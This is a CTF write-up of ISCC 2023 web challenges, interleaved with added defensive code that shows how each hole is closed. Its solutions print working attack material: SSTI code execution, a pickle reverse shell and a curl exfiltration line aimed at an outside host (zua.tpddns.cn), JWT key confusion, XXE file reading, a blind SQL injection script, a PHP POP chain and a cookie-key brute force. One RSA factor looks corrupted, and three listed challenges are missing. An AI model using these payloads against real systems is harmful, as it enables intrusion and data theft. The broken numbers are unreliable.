ISCC 2023 practice challenges: all web problems


Contents

web    ChatGGG.txt

web    ISCC内部零元购-2.txt (ISCC internal zero-yuan shopping, part 2)

web    ISCC单身节抽奖.txt (ISCC Singles' Day lottery)

web    ISCC疯狂购物节-1.txt (ISCC crazy shopping festival, part 1)

web    Where_is_your_love.txt

web    上大号说话.txt (Speak from your main account)

web    小周的密码锁.txt (Xiao Zhou's combination lock)

web    羊了个羊.txt (Sheep a Sheep)

web    老狼老狼几点了.txt (Old wolf, what time is it?)


The challenges were solved in a hurry, so every write-up below is text only; there was no time for screenshots.

web    ChatGGG.txt

1. Enter "flag"

  The response points to fllaaag.txt

2. The network response shows the server is WSGI

  Guess: server-side template injection

3. Probe the filter

  {{ }} cannot be used

  {%print()%} works instead

4. Enter {%print(config)%} to view the configuration

5. Build the payload

  (1) + . * _ class base globals and most of the other usual building blocks are filtered

  (2) ~ serves as the concatenation operator, and ""[""] replaces .__

  (3) {%print(""["\x5f\x5fcla"~"ss\x5f\x5f"]["\x5F\x5Fba"~"se\x5F\x5F"]["\x5F\x5Fsubcla"~"sses\x5F\x5F"]()[233]["\x5F\x5Fin"~"it\x5F\x5F"]["\x5F\x5Fglo"~"bals\x5F\x5F"]["\x5F\x5Fbuil"~"tins\x5F\x5F"]["eval"]("\x5F\x5Fimpo"~"rt\x5F\x5F(\"os\")")["popen"]("cat flllaag\x2etxt|bas"~"e64")["read"]())%}

  Here ""["\x5f\x5fcla"~"ss\x5f\x5f"] => ""["__class__"] => .__class__
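The bypass in step 5 works because the filter matches the literal strings class, _ and so on in the raw parameter, while Jinja only sees __class__ after it has decoded the \x5f escapes and evaluated the ~ concatenations. The Python below is an added illustration and not part of the original write-up: it applies those two normalisations before matching, which is what a request filter in front of this endpoint would have to do. The blocked-token list, the function names and the clean sample input are my own; the payload is the one quoted in step 5.

```python
import re

# Tokens a template parameter of this app has no business containing.
# The list is illustrative; rendering user input as a variable instead of
# as template source is the real fix, a blocklist is only a detection aid.
BLOCKED_TOKENS = ("__class__", "__base__", "__subclasses__", "__init__",
                  "__globals__", "__builtins__", "__import__", "eval", "popen")

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# "abc" ~ "def"  ->  "abcdef"   (Jinja's ~ operator concatenates as strings)
_TILDE_CONCAT = re.compile(r'"([^"]*)"\s*~\s*"([^"]*)"')


def decode_hex_escapes(text: str) -> str:
    """Resolve \\xNN escapes the way Jinja string literals do (hex is case-insensitive)."""
    return _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def join_tilde_concat(text: str) -> str:
    """Collapse chains like "a"~"b"~"c" into one literal; repeat until nothing changes."""
    while True:
        joined = _TILDE_CONCAT.sub(r'"\1\2"', text)
        if joined == text:
            return joined
        text = joined


def normalize_template_input(text: str) -> str:
    return join_tilde_concat(decode_hex_escapes(text))


def find_blocked_tokens(text: str) -> list:
    """Blocked tokens present after normalisation (empty list means clean)."""
    normalized = normalize_template_input(text)
    return [tok for tok in BLOCKED_TOKENS if tok in normalized]


# The payload from step 5 of the write-up, verbatim.
WRITEUP_PAYLOAD = (
    r'{%print(""["\x5f\x5fcla"~"ss\x5f\x5f"]["\x5F\x5Fba"~"se\x5F\x5F"]'
    r'["\x5F\x5Fsubcla"~"sses\x5F\x5F"]()[233]["\x5F\x5Fin"~"it\x5F\x5F"]'
    r'["\x5F\x5Fglo"~"bals\x5F\x5F"]["\x5F\x5Fbuil"~"tins\x5F\x5F"]["eval"]'
    r'("\x5F\x5Fimpo"~"rt\x5F\x5F(\"os\")")["popen"]("cat flllaag\x2etxt|bas"~"e64")["read"]())%}'
)

if __name__ == "__main__":
    # A naive substring filter never sees the dunder names in the raw request.
    print("raw contains __class__:", "__class__" in WRITEUP_PAYLOAD)
    print("normalised:", normalize_template_input(WRITEUP_PAYLOAD))
    print("blocked tokens:", find_blocked_tokens(WRITEUP_PAYLOAD))
```

Running it shows the raw string contains none of the dunder names while the normalised form contains every one of them, which is exactly the gap the challenge's filter left open.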
 

 

web    ISCC内部零元购-2.txt (ISCC internal zero-yuan shopping, part 2)

Method one (unintended solution)

1. The cookie holds a Python pickle

2. Most opcodes are filtered, but the R (REDUCE) opcode is not

3. Hand-write the opcodes: (Vxxxx\nitimeit\ntimeit\nR.

4. xxxx is the code to execute; replace it with __import__('os').system('bash -c "bash -i >& /dev/tcp/zua.tpddns.cn/1234 0<&1 2>&1"')

Its \u-escaped form is:

\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0073\u0079\u0073\u0074\u0065\u006d\u0028\u0027\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0022\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u007a\u0075\u0061\u002e\u0074\u0070\u0064\u0064\u006e\u0073\u002e\u0063\u006e\u002f\u0031\u0032\u0033\u0034\u0020\u0030\u003c\u0026\u0031\u0020\u0032\u003e\u0026\u0031\u0022\u0027\u0029

5. Final payload = b'''(V\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0073\u0079\u0073\u0074\u0065\u006d\u0028\u0027\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0022\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u007a\u0075\u0061\u002e\u0074\u0070\u0064\u0064\u006e\u0073\u002e\u0063\u006e\u002f\u0031\u0032\u0033\u0034\u0020\u0030\u003c\u0026\u0031\u0020\u0032\u003e\u0026\u0031\u0022\u0027\u0029\nitimeit\ntimeit\nR.'''

pickle.loads(payload)

Local test passes

6. Base64-encode it: KFZcdTAwNWZcdTAwNWZcdTAwNjlcdTAwNmRcdTAwNzBcdTAwNmZcdTAwNzJcdTAwNzRcdTAwNWZcdTAwNWZcdTAwMjhcdTAwMjdcdTAwNmZcdTAwNzNcdTAwMjdcdTAwMjlcdTAwMmVcdTAwNzNcdTAwNzlcdTAwNzNcdTAwNzRcdTAwNjVcdTAwNmRcdTAwMjhcdTAwMjdcdTAwNjJcdTAwNjFcdTAwNzNcdTAwNjhcdTAwMjBcdTAwMmRcdTAwNjNcdTAwMjBcdTAwMjJcdTAwNjJcdTAwNjFcdTAwNzNcdTAwNjhcdTAwMjBcdTAwMmRcdTAwNjlcdTAwMjBcdTAwM2VcdTAwMjZcdTAwMjBcdTAwMmZcdTAwNjRcdTAwNjVcdTAwNzZcdTAwMmZcdTAwNzRcdTAwNjNcdTAwNzBcdTAwMmZcdTAwN2FcdTAwNzVcdTAwNjFcdTAwMmVcdTAwNzRcdTAwNzBcdTAwNjRcdTAwNjRcdTAwNmVcdTAwNzNcdTAwMmVcdTAwNjNcdTAwNmVcdTAwMmZcdTAwMzFcdTAwMzJcdTAwMzNcdTAwMzRcdTAwMjBcdTAwMzBcdTAwM2NcdTAwMjZcdTAwMzFcdTAwMjBcdTAwMzJcdTAwM2VcdTAwMjZcdTAwMzFcdTAwMjJcdTAwMjdcdTAwMjkKaXRpbWVpdAp0aW1laXQKUi4

Replace the session value in the cookie to get a reverse shell

cat flag.txt gives the flag

Method two (intended solution)

SSTI template injection

1. Download the public key file

2. Change RS256 to HS256 (key confusion)

        import jwt

        PUBLIC_KEY = open('key.txt').read()

        payload = {
            "name": "{{cycler.__init__.__globals__.os.popen('cat flag.txt').read()}}",
            "exp": 9902085613,  # expiry time, any value will do
        }

        header = {
            "Access_IP": "10.15.6.211",
            "alg": "HS256",
            "typ": "JWT",
        }

        encoded = jwt.encode(payload, PUBLIC_KEY, algorithm='HS256', headers=header)
        print(encoded)

3. Replace the Auth value in the cookie and visit inner (the internal shop) to get the flag

# inner is the internal-network address from challenge 1

http://47.94.14.162:10009/iywqejdbcxnbamolxz238sdk
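Method two works only because the server lets the token's own alg header pick the algorithm, so the RSA public key ends up serving as an HMAC secret. A verifier that pins the algorithm in server configuration and refuses PEM material for HMAC closes both halves of that. The stdlib-only Python below is an added illustration, not the challenge's code and not PyJWT: verify_jwt implements HS256 checking itself and enforces the two policy checks; RS256 signature verification is delegated to a crypto library and only stubbed. The secret, the PEM stand-in and the claims are constructed. One caveat on the snippet above: recent PyJWT releases raise InvalidKeyError when a PEM-formatted key is handed to an HMAC algorithm, at encode and verify time alike, so a current PyJWT will not run it as written.

```python
import base64
import hashlib
import hmac
import json


class TokenRejected(Exception):
    """Raised for any token the verifier will not accept."""


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: str, extra_header=None) -> str:
    """Issue an HS256 token: the legitimate use of a shared secret."""
    header = {"alg": "HS256", "typ": "JWT", **(extra_header or {})}
    signing_input = (_b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + _b64url_encode(json.dumps(claims, separators=(",", ":")).encode()))
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)


def looks_like_pem(key: str) -> bool:
    return key.lstrip().startswith("-----BEGIN")


def verify_jwt(token: str, key: str, allowed_algs: frozenset) -> dict:
    """Return the claims if the token passes, otherwise raise TokenRejected.

    Policy 1: the algorithm set comes from server configuration, never from the token.
    Policy 2: asymmetric (PEM) key material is never used as an HMAC secret.
    """
    try:
        h, p, s = token.split(".")
        header = json.loads(_b64url_decode(h))
        claims = json.loads(_b64url_decode(p))
        signature = _b64url_decode(s)
    except ValueError:                       # covers bad base64, bad JSON, wrong part count
        raise TokenRejected("malformed token")

    alg = header.get("alg")
    if alg not in allowed_algs:              # policy 1
        raise TokenRejected(f"alg {alg!r} is not permitted for this verifier")

    if alg == "HS256":
        if looks_like_pem(key):              # policy 2
            raise TokenRejected("PEM key material cannot be an HMAC secret")
        expected = hmac.new(key.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, signature):
            raise TokenRejected("bad HMAC signature")
        return claims

    if alg == "RS256":
        # RSA verification needs a crypto library (e.g. `cryptography`); not shown here.
        raise NotImplementedError("RS256 verification is delegated to a crypto library")

    raise TokenRejected(f"unsupported alg {alg!r}")


def is_accepted(token: str, key: str, allowed_algs: frozenset) -> bool:
    try:
        verify_jwt(token, key, allowed_algs)
        return True
    except TokenRejected:
        return False


# Constructed sample material (not from the challenge).
SHARED_SECRET = "example-shared-secret"
FAKE_PUBLIC_KEY_PEM = ("-----BEGIN PUBLIC KEY-----\n"
                       "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA...constructed...\n"
                       "-----END PUBLIC KEY-----\n")
```

The two rejections are independent: pinning the algorithm set stops a token that says HS256 from reaching a service that only issues RS256, and the PEM check stops the public key from ever being fed to hmac.new even in a service that genuinely supports both algorithms.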

web    ISCC单身节抽奖.txt (ISCC Singles' Day lottery)

1. Register an account; the HTML source contains a base64 string

Decoding it gives a PHP serialized object

2. Set the password to ######";s:4:"sdog";i:1;s:8:"username";s:8:"#";}0

This overwrites the sdog variable and turns the user into a "single dog"

3. Download the ticket stub, which redirects to loadzk1myHJ0vaEoT5U0j6xDOVLBw693g83S.php; it has a checktime limit

4. After some trial and error, scientific notation bypasses it: 0.5e5

5. Site files can then be downloaded; index.php turns out to be encrypted

6. Run a wordlist; apidemo.php can be downloaded:

        <?php
        // Unfinished part of phase one: XML query interface apiR554CvL027POp0agxkQ1bBMXnH6Ad1rz.php
        // <?xml
        //     version="1.0" encoding="utf-8"
        // \?\>
        // <user>
        //     <name>rocker</name>
        //     <isdog>singledog</isdog>
        //     <award>4090Ti</award>
        ?>

7. This is an XXE injection

8. Payload

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///flag" >]><root><name>&xxe;</name></root>
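The apidemo.php comment shows an endpoint that expects a flat user document and nothing else, so a DTD in the request has no legitimate purpose. The Python below is an added illustration, not the challenge's PHP: it rejects any document carrying a DOCTYPE or ENTITY declaration before the XML parser sees it, then extracts only the three expected fields. The good document is constructed from the shape in the comment; the rejected one is the step-8 payload.

```python
import re
import xml.etree.ElementTree as ET

# Any DTD construct is out of place in this API: reject before parsing rather than
# relying on the parser's entity handling being configured safely.
_DTD_MARKER = re.compile(r"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)
EXPECTED_FIELDS = ("name", "isdog", "award")


def parse_user_xml(document):
    """Return {"name": ..., "isdog": ..., "award": ...} or raise ValueError."""
    text = document.decode("utf-8", errors="replace") if isinstance(document, bytes) else document
    if _DTD_MARKER.search(text):
        raise ValueError("DTD/entity declarations are not accepted")
    try:
        root = ET.fromstring(text.encode("utf-8"))
    except ET.ParseError as exc:
        raise ValueError(f"malformed XML: {exc}")
    if root.tag != "user":
        raise ValueError(f"unexpected root element <{root.tag}>")
    fields = {child.tag: (child.text or "").strip()
              for child in root if child.tag in EXPECTED_FIELDS}
    missing = [f for f in EXPECTED_FIELDS if f not in fields]
    if missing:
        raise ValueError(f"missing fields: {missing}")
    return fields


def accepts(document) -> bool:
    try:
        parse_user_xml(document)
        return True
    except ValueError:
        return False


# Constructed sample in the shape shown by the apidemo.php comment.
GOOD_DOC = """<?xml version="1.0" encoding="utf-8"?>
<user>
    <name>rocker</name>
    <isdog>singledog</isdog>
    <award>4090Ti</award>
</user>"""

# The step-8 payload from the write-up (external entity pointing at a local file).
XXE_DOC = ('<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [<!ELEMENT name ANY >'
           '<!ENTITY xxe SYSTEM "file:///flag" >]><root><name>&xxe;</name></root>')

if __name__ == "__main__":
    print(parse_user_xml(GOOD_DOC))
    print("payload accepted:", accepts(XXE_DOC))
```

Rejecting the DOCTYPE outright is the same posture as disallow-doctype-decl in the Java parsers: an API that never needs a DTD should not spend effort deciding which entities are safe.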
 

web    ISCC疯狂购物节-1.txt (ISCC crazy shopping festival, part 1)

1. Look for the base64 encoding of 美羊羊: 576O576K576K

        import os
        import time

        import requests

        url = "http://47.94.14.162:10001/more/get?page_number="
        headers = {
            'Cookie': 'csrftoken=62jDmpFZNKoZOWg44yHc0wOYDIWM2Ha9xiiPpV5PuNcvmJEqBJqorQczHSr7oP7M; sessionid=riu577im8sbtirvkfq9415ov91te7h6z',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.76',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
            'Cache-Control': 'max-age=0',
            'Connection': 'keep-alive',
            'Host': '47.94.14.162:10001',
            'Referer': 'http://47.94.14.162:10001/index/',
            'Upgrade-Insecure-Requests': '1',
        }

        os.makedirs('./1', exist_ok=True)  # pages are saved here
        i = 0
        while i < 126:
            i += 1
            try:
                res = requests.get(url + str(i), headers=headers)
            except requests.RequestException:
                i -= 1  # retry the same page
                continue
            print(i, len(res.text))
            # too fast: the server answers with a short rate-limit message
            if len(res.text) == 11:
                time.sleep(0.5)
                print(res.text)
            if "576O576K576K" in res.text:
                print(res.text)
            if len(res.text) < 1000:
                i -= 1  # retry
            else:
                # save to a file for easier inspection
                with open('./1/' + str(i) + '.txt', 'w') as f:
                    f.write(res.text)

2. A fl4g field shows up; try that column

        from time import sleep

        import requests

        # bypass "are you kidding me"
        cookies = {
            'csrftoken': 'Xx1QgCADdjAnhYNOnuV4on7hReuXXfaJ5dPy00n16ZRpegQzpy8XXHSvram7rO31',
            'sessionid': "q7kcs19owhq5nf42cln72dckwocgx3kd",
        }
        headers = {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
            'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6',
            'Cache-Control': 'max-age=0',
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36',
        }

        def str_to_hex(s):
            # 'ab' -> '6162'
            result = ''
            for ch in s:
                result += hex(ord(ch))[2:]
            return result

        # a regex filter only lets through 0x followed by four encoded characters
        url = "http://47.94.14.162:10001/Details/search?id=4875610)||fl4g like binary 0x25{}{}25 %23"
        alphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$&()*+,-./:;<=>?@[\\]^`{|}~"
        result = 'ISCC{'
        for i in range(1, 100):
            for ch in alphabet:
                # pattern %<previous char><candidate>% as hex: 0x25 .. 25
                payload = url.format(str_to_hex(result[-1]), str_to_hex(ch))
                print(payload)
                r = requests.get(url=payload, cookies=cookies, headers=headers)
                sleep(1.3)
                if "too fast" in r.text:
                    print("too fast")
                    sleep(2)
                    r = requests.get(url=payload, cookies=cookies, headers=headers)
                if "576O576K576K" in r.text:
                    print(payload)
                    result += ch
                    print("Success:", result)
                    break

Once the loop finishes, the flag is recovered
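Step 2 works because the id parameter is spliced into the SQL text and the only defence is a regex on the literal, which the hex form 0x25...25 sidesteps. The Python below is an added illustration using an in-memory SQLite table of my own, not the challenge's MySQL schema: it puts the string-built query next to a parameterised one, so the first turns into a yes/no oracle on the fl4g column while the second never interprets the parameter as SQL. Table contents are constructed; SQLite has no BINARY keyword and treats || as concatenation, so the probe uses OR ... LIKE where the write-up used || ... like binary.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the shop's product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE goods (id INTEGER PRIMARY KEY, name TEXT, fl4g TEXT)")
    conn.executemany(
        "INSERT INTO goods VALUES (?, ?, ?)",
        [(1, "美羊羊", "ISCC{constructed-example}"), (2, "喜羊羊", None), (3, "懒羊羊", None)],
    )
    return conn


def search_vulnerable(conn, user_id: str) -> list:
    """String-built query: the parameter is parsed as SQL, so a crafted value
    rewrites the WHERE clause. Same shape as the endpoint the write-up probes."""
    sql = f"SELECT name FROM goods WHERE id=({user_id})"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, user_id: str) -> list:
    """Validate the type, then bind: the driver sends a value, never SQL text."""
    if not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return [row[0] for row in conn.execute("SELECT name FROM goods WHERE id=?", (int(user_id),))]


def is_accepted_by_safe(conn, user_id: str) -> bool:
    try:
        search_safe(conn, user_id)
        return True
    except ValueError:
        return False


# Values shaped like the write-up's step-2 probe: close the parenthesis, add a
# condition on fl4g, comment out the rest. Whether a row comes back is the oracle.
PROBE_HIT = "0) OR fl4g LIKE 'ISCC{%' --"
PROBE_MISS = "0) OR fl4g LIKE 'FLAG{%' --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, hit :", search_vulnerable(db, PROBE_HIT))
    print("vulnerable, miss:", search_vulnerable(db, PROBE_MISS))
    print("safe accepts probe:", is_accepted_by_safe(db, PROBE_HIT))
```

The integer check in search_safe is there for clarity, not as the defence: even without it, binding the value with ? means the database receives the probe as a string compared against id and returns nothing.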

web    Where_is_your_love.txt

1. Decoding the JS reveals three files

  an encrypted letter.php, a PEM public key, and a PHP deserialization entry point

2. Build the POP chain

  Read phpinfo:

  http://47.94.14.162:10003/LoveStory.php?iscc=O:3:%22boy%22:1:{s:4:%22like%22;O:4:%22girl%22:1:{s:7:%22boyname%22;O:6:%22helper%22:2:{s:4:%22name%22;O:3:%22boy%22:1:{s:4:%22like%22;O:6:%22helper%22:2:{s:4:%22name%22;N;s:6:%22string%22;a:1:{s:6:%22string%22;s:7:%22phpinfo%22;}}};s:6:%22string%22;s:4:%226666%22;}}}

  "love_story::love" cannot be used, since the $this variable cannot be set that way

  Use $a = array("string" => [$l, "love"]); instead

        <?php
        class boy
        {
            public $like;

            public function __destruct()
            {
                echo "能请你喝杯奶茶吗?\n";
                @$this->like->make_friends();
            }

            public function __toString()
            {
                echo "拱火大法好\n";
                return $this->like->string;
            }
        }

        class girl
        {
            private $boyname;

            public function __construct($a)
            {
                $this->boyname = $a;
            }

            public function __call($func, $args)
            {
                echo "我害羞羞\n";
                isset($this->boyname->name);
            }
        }

        class helper
        {
            private $name; # {"string":"love_story::love"}
            private $string;

            public function __construct($a, $string)
            {
                if ($a === 1) {
                    $this->name = array('string' => '(new love_story())->love');
                    var_dump($this->name);
                    var_dump($this->name['string']);
                } else {
                    $this->name = $a;
                }
                $this->string = $string;
            }

            public function __isset($val)
            {
                echo "僚机上线\n";
                echo $this->name;
            }

            public function __get($name)
            {
                echo "僚机不懈努力\n";
                $var = $this->$name;
                var_dump($var);
                var_dump($var[$name]);
                $var[$name](); # (new love_story())->love()
            }
        }

        class love_story
        {
            public $fall_in_love = array("girl_and_boy");

            public function __construct()
            {
                echo "construct nihao";
            }

            public function love()
            {
                echo "爱情萌芽\n";
                array_walk($this, function ($make, $colo) {
                    echo "坠入爱河,给你爱的密码\n";
                    if ($make[0] === "girl_and_boy" && $colo === "fall_in_love") {
                        global $flag;
                        echo $flag;
                        echo "good";
                    }
                });
            }
        }

        getcwd();
        $b1 = new boy();
        $b2 = new boy();
        $h1 = new helper($b2, "222");
        $g = new girl($h1);
        # $a["string"] = "love_story::love";
        $l = new love_story();
        $a = array("string" => [$l, "love"]);
        $h2 = new helper(1, $a);
        $b2->like = $h2;
        $b1->like = $g;
        echo urlencode(serialize($b1));

  This yields e3e6121b3e253c591ce407333a5e5a04272a58e7175a0b34060a5b28375e270809e13e3e3404

3. Write Python to decrypt the RSA

  Factor n into p and q on a factoring website

        from Crypto.Util.number import long_to_bytes
        from Crypto.PublicKey import RSA
        import codecs

        with open("keyiscc.pem", "rb") as f:
            key = RSA.import_key(f.read())
        print(f"n = {key.n}")
        print(f"e = {key.e}")

        n = 21632595061498942456591176284485458726074437255982049051386399661866343401307576418742779935973203520468696897782308820580710694887656859447653301575912839865540207043886422473424543631000613842175006881377927881354616669050512971265340129939652367389539089568185762381769176974757484155591541925924309034566325122477217195694622210444478497422147703839359963069352123250114163369656862332886519324535078617986837018261033100555378934126290111146362437878180948892817526628614714852292454750429061910217210651682864700027396878086089765753730027466491890569705897416499997534143482201450410155650707746775053846974603
        e = 65537
        p = 147080233415299360057845495186390765586922902910770748924042642102066002833475419563625282038534033761523277282491713393841245804046571337610325158434942879464810055753965320619327164976752647165681046903418924945132096866002693037715397450918689064404951199247250188795306045444756953833882242163199922206967
        q = 147080233415299360057845495186390765586922902910770748924042475419563625282038534033761523277282491713393841245804046571337610325158434942879464810055753965320619327164976752647165681046903418924945132096866002693037715397450918689064404951199247250188795306045444756953833882242163199922205709

        with open('letter.php', 'rb') as f:
            c = f.read()
        c = int.from_bytes(c, byteorder='big')

        phi = (p - 1) * (q - 1)
        d = pow(e, -1, phi)  # modular inverse, Python 3.8+
        m = pow(c, d, n)
        print(long_to_bytes(int(m)))

        # the hex string obtained above: undo xor 100, the -10 shift, the reversal and rot13
        flag = 'e3243907335e1c191b5a3705093a5f24582f185f11293b251f082614043e5be516e13e3e3404'
        flag1 = ''
        for i in range(0, len(flag), 2):
            cc = int(flag[i:i+2], 16)
            b = cc ^ 100
            a = chr(b - 10)
            flag1 += a
        print(codecs.decode(flag1[::-1], 'rot13'))

Decrypting gives the flag
 

web    上大号说话.txt (Speak from your main account)

1. Enter 马保国

  A .git directory is exposed

  Python pickle deserialization

2. The cookie is encrypted

        import base64

        from cryptography.fernet import Fernet

        ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
        TOKEN = b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U="

        def generate_key(key: str):
            # the app pads a short string with '0' bytes up to the 32 bytes Fernet needs
            key_byte = key.encode()
            return base64.urlsafe_b64encode(key_byte + b'0' * 28)

        def crypto(base_str):
            return cipher_suite.encrypt(base_str)

        def decode(t):
            try:
                print(cipher_suite.decrypt(t))
                print("------------" + all + "-------------------")
            except Exception:
                pass

        num = 0
        all = ''
        for i in '5':
            for j in ALPHABET:
                for k in ALPHABET:
                    for z in ALPHABET:
                        all = i + j + k + z
                        num += 1
                        if num % 10000 == 0:
                            print(all)
                        cipher_suite = Fernet(generate_key(all))
                        decode(TOKEN)

  The cookie decrypts with the key 5MbG

3. No output is echoed back

  Listen on a public IP instead

  curl zua.tpddns.cn:1234/`cat flagucjbgaxqef.txt|base64`

  The R opcode turns out to be filtered

4. Build the opcodes

  b'\x80\x03c__main__\nMember\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl zua.tpddns.cn:1234/`cat flagucjbgaxqef.txt|base64`\nb.'

        import base64

        from cryptography.fernet import Fernet

        def generate_key(key: str):
            key_byte = key.encode()
            return base64.urlsafe_b64encode(key_byte + b'0' * 28)

        def crypto(base_str):
            return cipher_suite.encrypt(base_str)

        def decode(t):
            try:
                print(cipher_suite.decrypt(t))
                print("------------" + all + "-------------------")
                exit()
            except Exception:
                pass

        all = "5MbG"  # key recovered in step 2
        cipher_suite = Fernet(generate_key(all))

        print(crypto(b'\x80\x03c__main__\nMember\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl zua.tpddns.cn:1234/`cat flagucjbgaxqef.txt|base64`\nb.'))
        # decode(b"gAAAAABkbgX5ULO_yPmzK5cLusRWO9eeWW-5-MruKo3SMn29dxd4ymBY0IAt-3KJcHnYI5k7ZYIP9p8O59NoQf_o0pK8Zp-zJe5_h0-eNl86g8hsUmZakXP5d0u9QmwiViRQe8e0F_ORzxOoXnHPA4qlVySkCfeYcQCAUs8fXQZyRA6mwWgJklQ=")

  Encrypted result: gAAAAABkbgc2jXRhMnhB6ByRTx_31_oUchMP2wbrwyiLncydkyz8sycBHyPOY4zUlDJMdg0GLiwdh49tDzieZFl8GY01nZrLcnqAVf3_oAM2a8qBvjTFtb81xZsN9ZxJV5M3OcH1v78ItP4Alxg-VX74Py9kSLAtVtXmc87RX4dlLsNulmwiat1r5e3VoNfY9-jXcb1zruJfqyFs1ZE1KtWGW8JcTgLeww==

  The listener then receives the base64-encoded flag
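Both pickle solutions on this page, method one of ISCC内部零元购-2 (where (V...\nitimeit\ntimeit\nR. calls timeit.timeit on attacker text) and step 4 above (where cos\nsystem\n followed by b installs os.system as __setstate__), rely on the unpickler resolving an arbitrary module\nname reference. Blocking the R opcode, as the challenges did, still leaves the i, c and b paths open. The Python below is an added illustration, not either challenge's code: it overrides find_class so only an explicit allowlist can be referenced, which stops every one of those opcode paths at the point where a name is looked up. The allowlist and the sample pickles are my own; the INST sample keeps the write-up's opcode shape with a harmless statement in place of the command.

```python
import io
import pickle
import timeit

# Names a session cookie for this app may legitimately reference. Everything else,
# including os.system, timeit.timeit and __main__.Member, is refused at lookup time.
# An application would add its own data classes here explicitly.
SAFE_GLOBALS = {
    "builtins": {"set", "frozenset", "bytearray", "complex", "range", "slice"},
    "collections": {"OrderedDict", "deque"},
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for GLOBAL (c), STACK_GLOBAL, INST (i) and OBJ opcodes alike.
        if name in SAFE_GLOBALS.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def loads_or_reason(data: bytes):
    """(value, None) on success, (None, message) when the unpickler refused it."""
    try:
        return restricted_loads(data), None
    except pickle.UnpicklingError as exc:
        return None, str(exc)


# Constructed samples.
LEGIT_SESSION = pickle.dumps({"user": "alice", "cart": [3, 7], "tags": {"vip"}})
# Same opcode shape as the write-up's (V...\nitimeit\ntimeit\nR. with a harmless
# statement: MARK, UNICODE "pass", INST timeit.timeit, REDUCE, STOP.
INST_PICKLE = b"(Vpass\nitimeit\ntimeit\nR."
# A plain by-reference pickle of a function (GLOBAL / STACK_GLOBAL path).
GLOBAL_PICKLE = pickle.dumps(timeit.timeit)

if __name__ == "__main__":
    print(loads_or_reason(LEGIT_SESSION))
    print(loads_or_reason(INST_PICKLE))
    print(loads_or_reason(GLOBAL_PICKLE))
```

The refusal happens before the referenced object is instantiated or called, so the INST sample never reaches timeit at all. Signing the cookie (which the second method of the first challenge shows the app attempting with JWT) is the complementary control: a restricted unpickler limits what a tampered cookie can do, a MAC stops tampered cookies from being accepted.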

web    小周的密码锁.txt (Xiao Zhou's combination lock)

1. password2=5 shows the source

2. Write a Python script to collide the sha1 value

        from hashlib import sha1
        from itertools import product

        CHARS = ' #"%$&)(+*-,/.1234567890'
        num = 0
        for combo in product(CHARS, repeat=6):
            x = ''.join(combo)
            num += 1
            if sha1(x.encode()).hexdigest()[-6:] == 'a05c53':
                print(x)
            if num % 100000 == 0:
                print(num)

        # working backwards
